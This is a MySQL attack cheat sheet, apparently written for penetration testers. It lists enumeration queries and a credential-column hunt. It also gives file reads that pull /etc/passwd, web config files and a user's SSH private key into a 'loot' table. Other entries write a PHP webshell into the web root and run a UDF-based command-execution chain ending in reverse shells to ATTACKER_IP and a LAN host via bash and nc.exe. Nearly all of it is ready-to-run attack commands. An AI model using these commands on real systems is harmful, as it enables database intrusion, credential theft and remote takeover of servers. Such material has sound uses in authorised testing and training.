Use this as a quick reference for MySQL enumeration, file access, and command execution.
Connect
mysql -h HOST -u USER -p
mysql -h HOST -P 3306 -u USER -p
mysql -u USER -p -S /var/run/mysqld/mysqld.sock
mysql -h HOST -u USER -p'PASSWORD' --ssl --skip-ssl-verify-server-cert
Identity And Grants
SELECT USER(), CURRENT_USER();
SHOW GRANTS FOR CURRENT_USER();
SELECT User,Host,File_priv,Super_priv FROM mysql.user WHERE File_priv='Y' OR Super_priv='Y';
Server Context
SELECT VERSION();
SHOW VARIABLES LIKE 'hostname';
SHOW VARIABLES LIKE 'version_compile_os';
SHOW VARIABLES LIKE 'secure_file_priv';
SHOW VARIABLES LIKE 'local_infile';
SHOW VARIABLES LIKE 'plugin_dir';
SHOW PLUGINS;
Schema And Data
SHOW DATABASES;
USE DB;
SHOW TABLES;
DESCRIBE table_name;
SELECT * FROM table_name LIMIT 10;
Information schema:
SELECT table_name FROM information_schema.tables WHERE table_schema='DB';
SELECT column_name,data_type FROM information_schema.columns WHERE table_schema='DB' AND table_name='TABLE';
Credential column hunt:
SELECT table_schema, table_name, column_name
FROM information_schema.columns
WHERE column_name LIKE '%pass%'
OR column_name LIKE '%token%'
OR column_name LIKE '%secret%'
OR column_name LIKE '%key%';
File Read And Write
Read:
SELECT LOAD_FILE('/etc/passwd');
SELECT LOAD_FILE('C:/Windows/win.ini');
Write:
SELECT 'test' INTO OUTFILE '/var/lib/mysql-files/test.txt';
SELECT 'test' INTO DUMPFILE '/var/lib/mysql-files/test.bin';
Webshell:
SELECT '<?php system($_GET["c"]); ?>' INTO OUTFILE '/var/www/html/shell.php';
LOCAL INFILE
SHOW VARIABLES LIKE 'local_infile';
CREATE TABLE loot(line TEXT);
LOAD DATA LOCAL INFILE '/var/www/html/config.php' INTO TABLE loot;
LOAD DATA LOCAL INFILE '/home/victim/.ssh/id_rsa' INTO TABLE loot;
LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE loot FIELDS TERMINATED BY '\n';
UDF RCE
Plugin directory:
SHOW VARIABLES LIKE 'plugin_dir';
Linux:
SELECT load_file('/tmp/lib_mysqludf_sys.so') INTO DUMPFILE '/usr/lib/mysql/plugin/udf.so';
CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so';
SELECT sys_eval('id');
SELECT sys_eval('bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"');
Windows:
SELECT load_file('\\\\192.168.x.x\\share\\lib_mysqludf_sys_64.dll') INTO DUMPFILE 'C:\\xampp\\mysql\\lib\\plugin\\udf.dll';
CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll';
SELECT sys_eval('whoami');
SELECT sys_eval('net use X: \\\\192.168.x.x\\kali /user:kali kali');
SELECT sys_eval('X:\\nc.exe -e cmd.exe 192.168.x.x 80');
Variant if the library exports sys_bineval:
CREATE FUNCTION sys_bineval RETURNS INT SONAME 'udf.dll';
SELECT sys_bineval('whoami');
Listener:
nc -lvnp 4444
nc -lvnp 80
Cleanup:
DROP FUNCTION IF EXISTS sys_eval;
DROP FUNCTION IF EXISTS sys_bineval;
DROP FUNCTION IF EXISTS sys_exec;
mysqlsh
sudo docker run -it --rm mysql/mysql-server mysqlsh
\connect mysqlx://USERNAME@HOST:33060
\exit